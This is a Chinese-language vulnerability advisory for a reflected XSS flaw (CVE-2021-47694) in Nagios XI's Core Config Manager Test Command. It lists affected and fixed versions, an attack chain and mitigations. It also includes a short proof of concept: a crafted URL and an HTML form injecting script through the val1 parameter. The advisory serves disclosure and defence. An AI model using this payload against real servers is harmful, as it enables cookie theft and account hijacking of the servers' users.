CVE-2021-47694: Nagios XI CCM Test Command反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2021-47694

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI Core Config Manager (CCM)

漏洞概述

CVE-2021-47694是Nagios XI产品中的一个中危安全漏洞，存在于Core Config Manager (CCM)组件中。该漏洞为反射型跨站脚本攻击（Reflected XSS），允许攻击者通过特制的恶意链接诱导用户点击，在受害者的浏览器上下文中执行任意JavaScript代码。漏洞主要影响Nagios XI的Test Command功能，由于该功能对用户输入缺乏充分的验证和转义处理，攻击者可利用此缺陷窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。CVSS 3.1评分为6.1，属于中危级别，攻击复杂度低且无需认证，但需要用户交互才能触发。漏洞由VulnCheck发现并披露，建议相关用户及时更新到安全版本以消除风险。

技术细节

该漏洞的根本原因在于Nagios XI的Core Config Manager组件中Test Command功能对用户输入的处理存在安全缺陷。攻击者可以通过构造包含恶意JavaScript代码的参数值，当受害者访问包含该恶意参数的URL时，服务器将未经转义的用户输入直接反射回响应页面。浏览器在解析响应时，会将恶意脚本作为合法代码执行，从而实现XSS攻击。攻击者通常需要诱导受害者点击特制的链接，该链接可能伪装成正常的Nagios XI管理界面链接。由于漏洞位于需要用户交互的Test Command功能中，攻击成功依赖于目标用户的点击行为。攻击者可利用此漏洞窃取认证令牌、冒充用户执行操作或植入进一步的攻击载荷。修复版本为CCM 3.1.4和Nagios XI 5.8.6，升级后可消除该安全风险。

攻击链分析

STEP 1

步骤1

攻击者收集目标Nagios XI服务器信息，确认版本低于5.8.6或CCM组件低于3.1.4

STEP 2

步骤2

攻击者构造包含恶意JavaScript payload的URL，针对Test Command功能的参数进行注入

STEP 3

步骤3

攻击者将恶意链接进行伪装，可能通过邮件、即时通讯或社交工程手段诱导目标用户点击

STEP 4

步骤4

目标用户点击恶意链接，浏览器向Nagios XI服务器发送包含XSS payload的请求

STEP 5

步骤5

服务器将用户输入未经转义直接反射回响应页面

STEP 6

步骤6

浏览器解析响应时执行注入的恶意脚本，攻击者可在受害者上下文中窃取Cookie或执行操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2021-47694 PoC - Reflected XSS in Nagios XI CCM Test Command -->
<!-- Attack Vector: Inject JavaScript via Test Command parameter -->

<!-- Malicious URL Pattern -->
<!-- https://<target>/nagiosxi/includes/components/ccm/ -->
<!-- ?cmd=modval&test=command&val1=<script>alert(document.cookie)</script> -->

<!-- Example PoC URL -->
<!-- https://vulnerable-server/nagiosxi/includes/components/ccm/ -->
<!-- ?cmd=modval&test=command&val1=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E -->

<!-- HTML Form PoC -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2021-47694 PoC</title>
</head>
<body>
    <h2>Nagios XI CCM Reflected XSS PoC</h2>
    <form action="https://TARGET_SERVER/nagiosxi/includes/components/ccm/" method="GET">
        <input type="hidden" name="cmd" value="modval">
        <input type="hidden" name="test" value="command">
        <input type="hidden" name="val1" value="<script>alert(document.domain)</script>">
        <input type="submit" value="Click to Trigger XSS">
    </form>
    <p>Replace TARGET_SERVER with the vulnerable Nagios XI server address.</p>
</body>
</html>

影响范围

Nagios XI Core Config Manager (CCM) < 3.1.4

Nagios XI < 5.8.6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制对/nagiosxi/includes/components/ccm/路径的访问，仅允许受信任的管理员访问；2) 在Web应用防火墙(WAF)层面添加XSS防护规则，过滤包含<script>标签和JavaScript事件处理器的请求；3) 提醒用户不要点击来源不明的链接，尤其是伪装成Nagios管理界面的URL；4) 启用HttpOnly和Secure属性的Cookie配置，降低会话劫持风险。